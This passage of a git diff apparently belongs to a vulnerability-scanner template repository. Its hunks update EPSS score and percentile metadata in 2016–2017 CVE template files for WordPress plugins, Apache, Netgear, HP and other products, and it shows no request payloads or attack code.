be52af3ec6..656b2f8c1f 100644 --- a/http/cves/2016/CVE-2016-1000139.yaml +++ b/http/cves/2016/CVE-2016-1000139.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2016-1000139 cwe-id: CWE-79 epss-score: 0.00116 - epss-percentile: 0.45117 + epss-percentile: 0.45133 cpe: cpe:2.3:a:infusionsoft_project:infusionsoft:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-1000140.yaml b/http/cves/2016/CVE-2016-1000140.yaml index 19edbb19ce..8e89094314 100644 --- a/http/cves/2016/CVE-2016-1000140.yaml +++ b/http/cves/2016/CVE-2016-1000140.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2016-1000140 cwe-id: CWE-79 epss-score: 0.00119 - epss-percentile: 0.45718 + epss-percentile: 0.45731 cpe: cpe:2.3:a:new-year-firework_project:new-year-firework:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-1000141.yaml b/http/cves/2016/CVE-2016-1000141.yaml index 994e14c45c..b4b3770f23 100644 --- a/http/cves/2016/CVE-2016-1000141.yaml +++ b/http/cves/2016/CVE-2016-1000141.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2016-1000141 cwe-id: CWE-79 epss-score: 0.00142 - epss-percentile: 0.49666 + epss-percentile: 0.49683 cpe: cpe:2.3:a:page-layout-builder_project:page-layout-builder:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-1000142.yaml b/http/cves/2016/CVE-2016-1000142.yaml index bf0dbf607e..208412bd4a 100644 --- a/http/cves/2016/CVE-2016-1000142.yaml +++ b/http/cves/2016/CVE-2016-1000142.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2016-1000142 cwe-id: CWE-79 epss-score: 0.00103 - epss-percentile: 0.41645 + epss-percentile: 0.41666 cpe: cpe:2.3:a:parsi-font_project:parsi-font:4.2.5:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-1000143.yaml b/http/cves/2016/CVE-2016-1000143.yaml index 66d2834e3f..e160ce582c 100644 --- a/http/cves/2016/CVE-2016-1000143.yaml +++ b/http/cves/2016/CVE-2016-1000143.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2016-1000143 cwe-id: CWE-79 epss-score: 0.00142 - epss-percentile: 0.49666 + epss-percentile: 0.49683 cpe: cpe:2.3:a:photoxhibit_project:photoxhibit:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-1000146.yaml b/http/cves/2016/CVE-2016-1000146.yaml index a215a32c3e..926a42d3db 100644 --- a/http/cves/2016/CVE-2016-1000146.yaml +++ b/http/cves/2016/CVE-2016-1000146.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2016-1000146 cwe-id: CWE-79 epss-score: 0.00119 - epss-percentile: 0.45718 + epss-percentile: 0.45731 cpe: cpe:2.3:a:pondol-formmail_project:pondol-formmail:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-1000148.yaml b/http/cves/2016/CVE-2016-1000148.yaml index 8369e848af..ba2beeaefe 100644 --- a/http/cves/2016/CVE-2016-1000148.yaml +++ b/http/cves/2016/CVE-2016-1000148.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2016-1000148 cwe-id: CWE-79 epss-score: 0.00119 - epss-percentile: 0.45718 + epss-percentile: 0.45731 cpe: cpe:2.3:a:s3-video_project:s3-video:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-1000149.yaml b/http/cves/2016/CVE-2016-1000149.yaml index 2899676bd1..28163c322e 100644 --- a/http/cves/2016/CVE-2016-1000149.yaml +++ b/http/cves/2016/CVE-2016-1000149.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2016-1000149 cwe-id: CWE-79 epss-score: 0.00119 - epss-percentile: 0.45718 + epss-percentile: 0.45731 cpe: cpe:2.3:a:simpel-reserveren_project:simpel-reserveren:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-1000152.yaml b/http/cves/2016/CVE-2016-1000152.yaml index a2678ff313..1e88d5ad9f 100644 --- a/http/cves/2016/CVE-2016-1000152.yaml +++ b/http/cves/2016/CVE-2016-1000152.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2016-1000152 cwe-id: CWE-79 epss-score: 0.00353 - epss-percentile: 0.6886 + epss-percentile: 0.68885 cpe: cpe:2.3:a:tidio-form_project:tidio-form:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-1000153.yaml b/http/cves/2016/CVE-2016-1000153.yaml index c4899eb090..498f1ce6c3 100644 --- a/http/cves/2016/CVE-2016-1000153.yaml +++ b/http/cves/2016/CVE-2016-1000153.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2016-1000153 cwe-id: CWE-79 epss-score: 0.00142 - epss-percentile: 0.49813 + epss-percentile: 0.49832 cpe: cpe:2.3:a:tidio-gallery_project:tidio-gallery:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-1000154.yaml b/http/cves/2016/CVE-2016-1000154.yaml index eea380df6e..c6a55c3968 100644 --- a/http/cves/2016/CVE-2016-1000154.yaml +++ b/http/cves/2016/CVE-2016-1000154.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2016-1000154 cwe-id: CWE-79 epss-score: 0.00142 - epss-percentile: 0.49666 + epss-percentile: 0.49683 cpe: cpe:2.3:a:browserweb:whizz:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-1000155.yaml b/http/cves/2016/CVE-2016-1000155.yaml index b873d03ec0..986f4c0319 100644 --- a/http/cves/2016/CVE-2016-1000155.yaml +++ b/http/cves/2016/CVE-2016-1000155.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2016-1000155 cwe-id: CWE-79 epss-score: 0.00103 - epss-percentile: 0.41645 + epss-percentile: 0.41666 cpe: cpe:2.3:a:wpsolr:wpsolr-search-engine:7.6:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-10033.yaml b/http/cves/2016/CVE-2016-10033.yaml index 11f9ef7bea..2f39ff888b 100644 --- a/http/cves/2016/CVE-2016-10033.yaml +++ b/http/cves/2016/CVE-2016-10033.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2016-10033 cwe-id: CWE-77 epss-score: 0.97464 - epss-percentile: 0.99952 + epss-percentile: 0.99951 cpe: cpe:2.3:a:phpmailer_project:phpmailer:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2016/CVE-2016-10108.yaml b/http/cves/2016/CVE-2016-10108.yaml index a27363f7b1..8180492e84 100644 --- a/http/cves/2016/CVE-2016-10108.yaml +++ b/http/cves/2016/CVE-2016-10108.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2016-10108 cwe-id: CWE-77 epss-score: 0.84853 - epss-percentile: 0.98148 + epss-percentile: 0.9815 cpe: cpe:2.3:a:western_digital:mycloud_nas:2.11.142:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-10134.yaml b/http/cves/2016/CVE-2016-10134.yaml index 1a7f5eba9e..7dbf9d4f44 100644 --- a/http/cves/2016/CVE-2016-10134.yaml +++ b/http/cves/2016/CVE-2016-10134.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2016-10134 cwe-id: CWE-89 epss-score: 0.46819 - epss-percentile: 0.97058 + epss-percentile: 0.97061 cpe: cpe:2.3:a:zabbix:zabbix:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-10367.yaml b/http/cves/2016/CVE-2016-10367.yaml index c9587050f0..6ec11709cb 100644 --- a/http/cves/2016/CVE-2016-10367.yaml +++ b/http/cves/2016/CVE-2016-10367.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2016-10367 cwe-id: CWE-22 epss-score: 0.01346 - epss-percentile: 0.84662 + epss-percentile: 0.84669 cpe: cpe:2.3:a:opsview:opsview:4.5.0:*:*:*:pro:*:*:* metadata: verified: true diff --git a/http/cves/2016/CVE-2016-10368.yaml b/http/cves/2016/CVE-2016-10368.yaml index 94955234fa..f4fcc23584 100644 --- a/http/cves/2016/CVE-2016-10368.yaml +++ b/http/cves/2016/CVE-2016-10368.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2016-10368 cwe-id: CWE-601 epss-score: 0.00179 - epss-percentile: 0.54936 + epss-percentile: 0.54961 cpe: cpe:2.3:a:opsview:opsview:4.5.0:*:*:*:pro:*:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-10924.yaml b/http/cves/2016/CVE-2016-10924.yaml index d560ea823c..4227416323 100644 --- a/http/cves/2016/CVE-2016-10924.yaml +++ b/http/cves/2016/CVE-2016-10924.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2016-10924 cwe-id: CWE-22 epss-score: 0.01079 - epss-percentile: 0.82681 + epss-percentile: 0.82693 cpe: cpe:2.3:a:zedna_ebook_download_project:zedna_ebook_download:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-10940.yaml b/http/cves/2016/CVE-2016-10940.yaml index 8361518391..f72b5384ac 100644 --- a/http/cves/2016/CVE-2016-10940.yaml +++ b/http/cves/2016/CVE-2016-10940.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2016-10940 cwe-id: CWE-89 epss-score: 0.00696 - epss-percentile: 0.78031 + epss-percentile: 0.78045 cpe: cpe:2.3:a:zm-gallery_project:zm-gallery:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 3 diff --git a/http/cves/2016/CVE-2016-10956.yaml b/http/cves/2016/CVE-2016-10956.yaml index 5334927329..ffebba7926 100644 --- a/http/cves/2016/CVE-2016-10956.yaml +++ b/http/cves/2016/CVE-2016-10956.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2016-10956 cwe-id: CWE-20 epss-score: 0.01913 - epss-percentile: 0.87266 + epss-percentile: 0.87271 cpe: cpe:2.3:a:mail-masta_project:mail-masta:1.0:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2016/CVE-2016-10960.yaml b/http/cves/2016/CVE-2016-10960.yaml index 324eb04d98..272724c215 100644 --- a/http/cves/2016/CVE-2016-10960.yaml +++ b/http/cves/2016/CVE-2016-10960.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2016-10960 cwe-id: CWE-20 epss-score: 0.01127 - epss-percentile: 0.83059 + epss-percentile: 0.8307 cpe: cpe:2.3:a:joomlaserviceprovider:wsecure:*:*:*:*:lite:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-10973.yaml b/http/cves/2016/CVE-2016-10973.yaml index 7c65a89ba2..694c0528eb 100644 --- a/http/cves/2016/CVE-2016-10973.yaml +++ b/http/cves/2016/CVE-2016-10973.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2016-10973 cwe-id: CWE-79 epss-score: 0.00177 - epss-percentile: 0.54755 + epss-percentile: 0.54781 cpe: cpe:2.3:a:brafton:brafton:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2016/CVE-2016-10993.yaml b/http/cves/2016/CVE-2016-10993.yaml index 1dc01f6593..78ef2a5c28 100644 --- a/http/cves/2016/CVE-2016-10993.yaml +++ b/http/cves/2016/CVE-2016-10993.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2016-10993 cwe-id: CWE-79 epss-score: 0.00245 - epss-percentile: 0.62322 + epss-percentile: 0.62351 cpe: cpe:2.3:a:scoreme_project:scoreme:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-1555.yaml b/http/cves/2016/CVE-2016-1555.yaml index fd6569c761..c1f24a333f 100644 --- a/http/cves/2016/CVE-2016-1555.yaml +++ b/http/cves/2016/CVE-2016-1555.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2016-1555 cwe-id: CWE-77 epss-score: 0.97375 - epss-percentile: 0.99875 + epss-percentile: 0.99876 cpe: cpe:2.3:o:netgear:wnap320_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-2389.yaml b/http/cves/2016/CVE-2016-2389.yaml index 00251d6a64..e463a30755 100644 --- a/http/cves/2016/CVE-2016-2389.yaml +++ b/http/cves/2016/CVE-2016-2389.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2016-2389 cwe-id: CWE-22 epss-score: 0.24589 - epss-percentile: 0.961 + epss-percentile: 0.96103 cpe: cpe:2.3:a:sap:netweaver:7.40:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-3088.yaml b/http/cves/2016/CVE-2016-3088.yaml index d629a6336f..7116cabc58 100644 --- a/http/cves/2016/CVE-2016-3088.yaml +++ b/http/cves/2016/CVE-2016-3088.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2016-3088 cwe-id: CWE-20 epss-score: 0.83955 - epss-percentile: 0.9812 + epss-percentile: 0.98122 cpe: cpe:2.3:a:apache:activemq:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2016/CVE-2016-3978.yaml b/http/cves/2016/CVE-2016-3978.yaml index f6c6b8dbd9..846d0a893d 100644 --- a/http/cves/2016/CVE-2016-3978.yaml +++ b/http/cves/2016/CVE-2016-3978.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2016-3978 cwe-id: CWE-79 epss-score: 0.00217 - epss-percentile: 0.59558 + epss-percentile: 0.59591 cpe: cpe:2.3:o:fortinet:fortios:5.0.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-4437.yaml b/http/cves/2016/CVE-2016-4437.yaml index e135c5bbb2..1831fb648d 100644 --- a/http/cves/2016/CVE-2016-4437.yaml +++ b/http/cves/2016/CVE-2016-4437.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2016-4437 cwe-id: CWE-284 epss-score: 0.97507 - epss-percentile: 0.99978 + epss-percentile: 0.99977 cpe: cpe:2.3:a:apache:shiro:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-4975.yaml b/http/cves/2016/CVE-2016-4975.yaml index 9869ad09fd..53f9f26d69 100644 --- a/http/cves/2016/CVE-2016-4975.yaml +++ b/http/cves/2016/CVE-2016-4975.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2016-4975 cwe-id: CWE-93 epss-score: 0.00428 - epss-percentile: 0.71596 + epss-percentile: 0.71621 cpe: cpe:2.3:a:apache:http_server:2.2.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-4977.yaml b/http/cves/2016/CVE-2016-4977.yaml index bddf11b0f9..03c076baf5 100644 --- a/http/cves/2016/CVE-2016-4977.yaml +++ b/http/cves/2016/CVE-2016-4977.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2016-4977 cwe-id: CWE-19 epss-score: 0.03345 - epss-percentile: 0.90291 + epss-percentile: 0.90296 cpe: cpe:2.3:a:pivotal:spring_security_oauth:1.0.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-5649.yaml b/http/cves/2016/CVE-2016-5649.yaml index 03d5f9068f..a2b8fdeeaa 100644 --- a/http/cves/2016/CVE-2016-5649.yaml +++ b/http/cves/2016/CVE-2016-5649.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2016-5649 cwe-id: CWE-200,CWE-319 - epss-score: 0.15681 - epss-percentile: 0.95319 + epss-score: 0.15148 + epss-percentile: 0.95225 cpe: cpe:2.3:o:netgear:dgn2200_firmware:1.0.0.50_7.0.50:*:*:*:*:*:*:* metadata: max-request: 1 @@ -50,4 +50,5 @@ http: regex: - 'Success "([a-z]+)"' part: body -# digest: 4a0a00473045022100980f57c30aa860f1f780de4791c3ec448535e2cbe69b715ea45e05d40c3f85f402202dfe49ab619552bf8bd16d0420bf5f255ec3aba97bdbb2d2f77400ac90fd50b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100980f57c30aa860f1f780de4791c3ec448535e2cbe69b715ea45e05d40c3f85f402202dfe49ab619552bf8bd16d0420bf5f255ec3aba97bdbb2d2f77400ac90fd50b3:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2016/CVE-2016-6195.yaml b/http/cves/2016/CVE-2016-6195.yaml index a8f68249db..46116594b9 100644 --- a/http/cves/2016/CVE-2016-6195.yaml +++ b/http/cves/2016/CVE-2016-6195.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2016-6195 cwe-id: CWE-89 epss-score: 0.00284 - epss-percentile: 0.65166 + epss-percentile: 0.65202 cpe: cpe:2.3:a:vbulletin:vbulletin:*:patch_level_4:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2016/CVE-2016-6277.yaml b/http/cves/2016/CVE-2016-6277.yaml index 1b02247fe5..c795e3500e 100644 --- a/http/cves/2016/CVE-2016-6277.yaml +++ b/http/cves/2016/CVE-2016-6277.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2016-6277 cwe-id: CWE-352 epss-score: 0.97471 - epss-percentile: 0.99958 + epss-percentile: 0.99957 cpe: cpe:2.3:o:netgear:d6220_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-7834.yaml b/http/cves/2016/CVE-2016-7834.yaml index 736ac4c4a0..63d2947ce7 100644 --- a/http/cves/2016/CVE-2016-7834.yaml +++ b/http/cves/2016/CVE-2016-7834.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2016-7834 cwe-id: CWE-200 epss-score: 0.00202 - epss-percentile: 0.57974 + epss-percentile: 0.58004 cpe: cpe:2.3:o:sony:snc_series_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-7981.yaml b/http/cves/2016/CVE-2016-7981.yaml index a0d486a37d..0e51380b32 100644 --- a/http/cves/2016/CVE-2016-7981.yaml +++ b/http/cves/2016/CVE-2016-7981.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2016-7981 cwe-id: CWE-79 epss-score: 0.00258 - epss-percentile: 0.63325 + epss-percentile: 0.63358 cpe: cpe:2.3:a:spip:spip:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2016/CVE-2016-8527.yaml b/http/cves/2016/CVE-2016-8527.yaml index 501480b6d1..95996cfd01 100644 --- a/http/cves/2016/CVE-2016-8527.yaml +++ b/http/cves/2016/CVE-2016-8527.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2016-8527 cwe-id: CWE-79 epss-score: 0.0024 - epss-percentile: 0.61823 + epss-percentile: 0.61851 cpe: cpe:2.3:a:hp:airwave:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-0929.yaml b/http/cves/2017/CVE-2017-0929.yaml index 97c93dd291..03639fd49d 100644 --- a/http/cves/2017/CVE-2017-0929.yaml +++ b/http/cves/2017/CVE-2017-0929.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-0929 cwe-id: CWE-918 epss-score: 0.03588 - epss-percentile: 0.90581 + epss-percentile: 0.90588 cpe: cpe:2.3:a:dnnsoftware:dotnetnuke:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-1000029.yaml b/http/cves/2017/CVE-2017-1000029.yaml index 345305d447..d6b3462048 100644 --- a/http/cves/2017/CVE-2017-1000029.yaml +++ b/http/cves/2017/CVE-2017-1000029.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-1000029 cwe-id: CWE-200 epss-score: 0.00387 - epss-percentile: 0.70201 + epss-percentile: 0.70229 cpe: cpe:2.3:a:oracle:glassfish_server:3.0.1:*:*:*:open_source:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-1000163.yaml b/http/cves/2017/CVE-2017-1000163.yaml index 934d56102e..106a93e8b3 100644 --- a/http/cves/2017/CVE-2017-1000163.yaml +++ b/http/cves/2017/CVE-2017-1000163.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-1000163 cwe-id: CWE-601 epss-score: 0.00154 - epss-percentile: 0.51601 + epss-percentile: 0.51624 cpe: cpe:2.3:a:phoenixframework:phoenix:1.0.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-1000170.yaml b/http/cves/2017/CVE-2017-1000170.yaml index 97c66aa401..7873579259 100644 --- a/http/cves/2017/CVE-2017-1000170.yaml +++ b/http/cves/2017/CVE-2017-1000170.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-1000170 cwe-id: CWE-22 epss-score: 0.70305 - epss-percentile: 0.97663 + epss-percentile: 0.97665 cpe: cpe:2.3:a:jqueryfiletree_project:jqueryfiletree:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-1000486.yaml b/http/cves/2017/CVE-2017-1000486.yaml index 1bc54c8890..df41811845 100644 --- a/http/cves/2017/CVE-2017-1000486.yaml +++ b/http/cves/2017/CVE-2017-1000486.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2017-1000486 cwe-id: CWE-326 epss-score: 0.96894 - epss-percentile: 0.99612 + epss-percentile: 0.99613 cpe: cpe:2.3:a:primetek:primefaces:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-10075.yaml b/http/cves/2017/CVE-2017-10075.yaml index ae6a197e0f..3c89ef2921 100644 --- a/http/cves/2017/CVE-2017-10075.yaml +++ b/http/cves/2017/CVE-2017-10075.yaml @@ -18,7 +18,7 @@ info: cvss-score: 8.2 cve-id: CVE-2017-10075 epss-score: 0.00409 - epss-percentile: 0.70989 + epss-percentile: 0.71014 cpe: cpe:2.3:a:oracle:webcenter_content:11.1.1.9.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-10974.yaml b/http/cves/2017/CVE-2017-10974.yaml index 87af2b4514..6ea3324b7a 100644 --- a/http/cves/2017/CVE-2017-10974.yaml +++ b/http/cves/2017/CVE-2017-10974.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-10974 cwe-id: CWE-22 epss-score: 0.96161 - epss-percentile: 0.99333 + epss-percentile: 0.99334 cpe: cpe:2.3:a:yaws:yaws:1.91:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-11165.yaml b/http/cves/2017/CVE-2017-11165.yaml index 51a9d110d1..f8323cf758 100644 --- a/http/cves/2017/CVE-2017-11165.yaml +++ b/http/cves/2017/CVE-2017-11165.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2017-11165 cwe-id: CWE-200 epss-score: 0.94336 - epss-percentile: 0.98955 + epss-percentile: 0.98956 cpe: cpe:2.3:o:datataker:dt80_dex_firmware:1.50.012:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-11444.yaml b/http/cves/2017/CVE-2017-11444.yaml index d0737bed0a..88b254d189 100644 --- a/http/cves/2017/CVE-2017-11444.yaml +++ b/http/cves/2017/CVE-2017-11444.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-11444 cwe-id: CWE-89 epss-score: 0.04447 - epss-percentile: 0.91454 + epss-percentile: 0.91464 cpe: cpe:2.3:a:intelliants:subrion_cms:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-11512.yaml b/http/cves/2017/CVE-2017-11512.yaml index b6e1e49a19..0bda8d2dd0 100644 --- a/http/cves/2017/CVE-2017-11512.yaml +++ b/http/cves/2017/CVE-2017-11512.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-11512 cwe-id: CWE-22 epss-score: 0.97175 - epss-percentile: 0.99742 + epss-percentile: 0.99741 cpe: cpe:2.3:a:manageengine:servicedesk:9.3.9328:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-11586.yaml b/http/cves/2017/CVE-2017-11586.yaml index 6510a2075a..b56ca67fe7 100644 --- a/http/cves/2017/CVE-2017-11586.yaml +++ b/http/cves/2017/CVE-2017-11586.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-11586 cwe-id: CWE-601 epss-score: 0.00121 - epss-percentile: 0.46098 + epss-percentile: 0.46111 cpe: cpe:2.3:a:finecms:finecms:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-11629.yaml b/http/cves/2017/CVE-2017-11629.yaml index f99ebc28f2..000644e917 100644 --- a/http/cves/2017/CVE-2017-11629.yaml +++ b/http/cves/2017/CVE-2017-11629.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-11629 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40974 + epss-percentile: 0.40998 cpe: cpe:2.3:a:finecms:finecms:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-12138.yaml b/http/cves/2017/CVE-2017-12138.yaml index 4b299236ae..83b77533d9 100644 --- a/http/cves/2017/CVE-2017-12138.yaml +++ b/http/cves/2017/CVE-2017-12138.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-12138 cwe-id: CWE-601 epss-score: 0.00062 - epss-percentile: 0.24766 + epss-percentile: 0.24771 cpe: cpe:2.3:a:xoops:xoops:2.5.8:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2017/CVE-2017-12542.yaml b/http/cves/2017/CVE-2017-12542.yaml index 3abfd1a76d..23d11f0940 100644 --- a/http/cves/2017/CVE-2017-12542.yaml +++ b/http/cves/2017/CVE-2017-12542.yaml @@ -18,7 +18,7 @@ info: cvss-score: 10 cve-id: CVE-2017-12542 epss-score: 0.97377 - epss-percentile: 0.99879 + epss-percentile: 0.9988 cpe: cpe:2.3:o:hp:integrated_lights-out_4_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-12544.yaml b/http/cves/2017/CVE-2017-12544.yaml index defe838301..642701ada9 100644 --- a/http/cves/2017/CVE-2017-12544.yaml +++ b/http/cves/2017/CVE-2017-12544.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-12544 cwe-id: CWE-79 epss-score: 0.96723 - epss-percentile: 0.99535 + epss-percentile: 0.99536 cpe: cpe:2.3:a:hp:system_management_homepage:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-12583.yaml b/http/cves/2017/CVE-2017-12583.yaml index dce246c8a5..713c69b886 100644 --- a/http/cves/2017/CVE-2017-12583.yaml +++ b/http/cves/2017/CVE-2017-12583.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2017-12583 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40974 + epss-percentile: 0.40998 cpe: cpe:2.3:a:dokuwiki:dokuwiki:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-12615.yaml b/http/cves/2017/CVE-2017-12615.yaml index d125f4754c..f1fdec282a 100644 --- a/http/cves/2017/CVE-2017-12615.yaml +++ b/http/cves/2017/CVE-2017-12615.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2017-12615 cwe-id: CWE-434 epss-score: 0.97499 - epss-percentile: 0.99974 + epss-percentile: 0.99973 cpe: cpe:2.3:a:apache:tomcat:7.0:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2017/CVE-2017-12617.yaml b/http/cves/2017/CVE-2017-12617.yaml index c2592ec9e6..d83f35d8ef 100644 --- a/http/cves/2017/CVE-2017-12617.yaml +++ b/http/cves/2017/CVE-2017-12617.yaml @@ -20,7 +20,7 @@ info: cve-id: "CVE-2017-12617" cwe-id: CWE-434 epss-score: 0.97494 - epss-percentile: 0.99971 + epss-percentile: 0.9997 cpe: cpe:2.3:a:apache:tomcat:7.0.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2017/CVE-2017-12637.yaml b/http/cves/2017/CVE-2017-12637.yaml index e5c7319bb0..54e6799030 100644 --- a/http/cves/2017/CVE-2017-12637.yaml +++ b/http/cves/2017/CVE-2017-12637.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-12637 cwe-id: CWE-22 epss-score: 0.00648 - epss-percentile: 0.77041 + epss-percentile: 0.77062 cpe: cpe:2.3:a:sap:netweaver_application_server_java:7.50:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-12794.yaml b/http/cves/2017/CVE-2017-12794.yaml index 39d8417f2b..a6fe6a924f 100644 --- a/http/cves/2017/CVE-2017-12794.yaml +++ b/http/cves/2017/CVE-2017-12794.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2017-12794 cwe-id: CWE-79 epss-score: 0.00219 - epss-percentile: 0.59716 + epss-percentile: 0.5975 cpe: cpe:2.3:a:djangoproject:django:1.10.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-14135.yaml b/http/cves/2017/CVE-2017-14135.yaml index 2a1b64ede6..7793ba4224 100644 --- a/http/cves/2017/CVE-2017-14135.yaml +++ b/http/cves/2017/CVE-2017-14135.yaml @@ -18,7 +18,7 